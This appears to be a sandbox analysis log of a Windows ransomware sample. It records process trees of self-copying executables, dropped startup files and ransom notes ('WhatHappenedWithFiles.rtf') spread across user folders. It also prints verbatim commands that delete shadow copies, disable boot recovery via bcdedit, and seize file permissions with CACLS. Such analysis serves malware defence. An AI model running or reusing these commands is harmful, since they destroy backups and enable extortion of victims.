attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2216	attrib.exe
396	attrib.exe
2776	attrib.exe
2864	attrib.exe
2684	attrib.exe
2776	attrib.exe
740	attrib.exe
920	attrib.exe
2500	attrib.exe
2136	attrib.exe
1028	attrib.exe
1464	attrib.exe
2268	attrib.exe
2596	attrib.exe
2896	attrib.exe
948	attrib.exe
2136	attrib.exe
2648	attrib.exe
696	attrib.exe
1956	attrib.exe
1768	attrib.exe
1372	attrib.exe
1648	attrib.exe
832	attrib.exe
2908	attrib.exe
740	attrib.exe
1496	attrib.exe
1100	attrib.exe
1720	attrib.exe
1932	attrib.exe
848	attrib.exe
2496	attrib.exe
1804	attrib.exe
2572	attrib.exe
2384	attrib.exe
2576	attrib.exe
2424	attrib.exe
784	attrib.exe
2340	attrib.exe
2992	attrib.exe
1952	attrib.exe
2424	attrib.exe
2684	attrib.exe
2016	attrib.exe
3036	attrib.exe
2088	attrib.exe

C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
"C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2100

C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
"C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
2⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\467C2B~1.EXE" > "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe"
3⤵
PID:2832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" && "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2516

C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe
"C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2412

C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe
"C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
5⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\1TO4UAic.cmd"
6⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
7⤵
- Runs ping.exe
PID:948

C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe
"C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" N00fBwZXjOQTTX9M
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2484

C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe
"C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" N00fBwZXjOQTTX9M
4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" && "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2152

C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe
"C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:772

C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe
"C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:2256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" && "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
5⤵
- Loads dropped DLL
PID:592

C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe
"C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2772

C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe
"C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:2584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" && "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
5⤵
- Loads dropped DLL
PID:940

C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe
"C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:840

C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe
"C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" && "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
5⤵
- Loads dropped DLL
PID:2268

C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe
"C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1164

C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe
"C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:1928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\J7mkP1S9.cmd"
8⤵
PID:2624

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:2432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" && "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
5⤵
- Loads dropped DLL
PID:2712

C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe
"C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2240

C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe
"C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:1144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\JM2rTPHa.cmd"
8⤵
PID:976

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:2428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" && "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
5⤵
- Loads dropped DLL
PID:1856

C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe
"C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:396

C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe
"C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\k6zWXYwZ.cmd"
8⤵
PID:584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" && "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
5⤵
- Loads dropped DLL
PID:2312

C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe
"C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1972

C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe
"C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\th0QjboI.cmd"
8⤵
PID:1360

C:\Windows\SysWOW64\PING.EXE
ping -n 6 localhost
9⤵
- Runs ping.exe
PID:1160

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:1248

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C vssadmin.exe delete shadows /all /quiet
9⤵
PID:2500

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
10⤵
- Interacts with shadow copies
PID:2808

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\lbeBHbdx.cmd"
8⤵
PID:2444

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" && "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
5⤵
- Loads dropped DLL
PID:1372

C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe
"C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2728

C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe
"C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\clqQr3QD.cmd"
8⤵
PID:1904

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:2700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
5⤵
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
5⤵
PID:988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
5⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
5⤵
PID:2264

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
5⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\WhatHappenedWithFiles.rtf"
5⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Contacts\WhatHappenedWithFiles.rtf"
5⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\WhatHappenedWithFiles.rtf"
5⤵
PID:2556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\Links\WhatHappenedWithFiles.rtf"
5⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\LINKSF~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MICROS~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MSNWEB~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" && "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
5⤵
- Loads dropped DLL
PID:2580

C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe
"C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2028

C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe
"C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\Dy4bvWbn.cmd"
8⤵
PID:876

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:1484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
5⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
5⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
5⤵
PID:1380

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G Admin:F /C
6⤵
PID:2200

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
6⤵
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Searches\WhatHappenedWithFiles.rtf"
5⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
5⤵
PID:2344

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G Admin:F /C
6⤵
PID:1292

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
6⤵
- Views/modifies file attributes
PID:848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
5⤵
PID:1944

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
6⤵
PID:2240

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
6⤵
- Views/modifies file attributes
PID:2896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\Adobe\Acrobat\9.0\REPLIC~1\Security\WhatHappenedWithFiles.rtf"
5⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
5⤵
PID:2756

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
6⤵
PID:832

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
6⤵
- Views/modifies file attributes
PID:920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{11352~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
5⤵
PID:1712

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
6⤵
PID:2692

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
6⤵
- Views/modifies file attributes
PID:2684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
5⤵
PID:3012

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
6⤵
PID:1536

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
6⤵
- Views/modifies file attributes
PID:948

C:\Windows\SysWOW64\cmd.exe
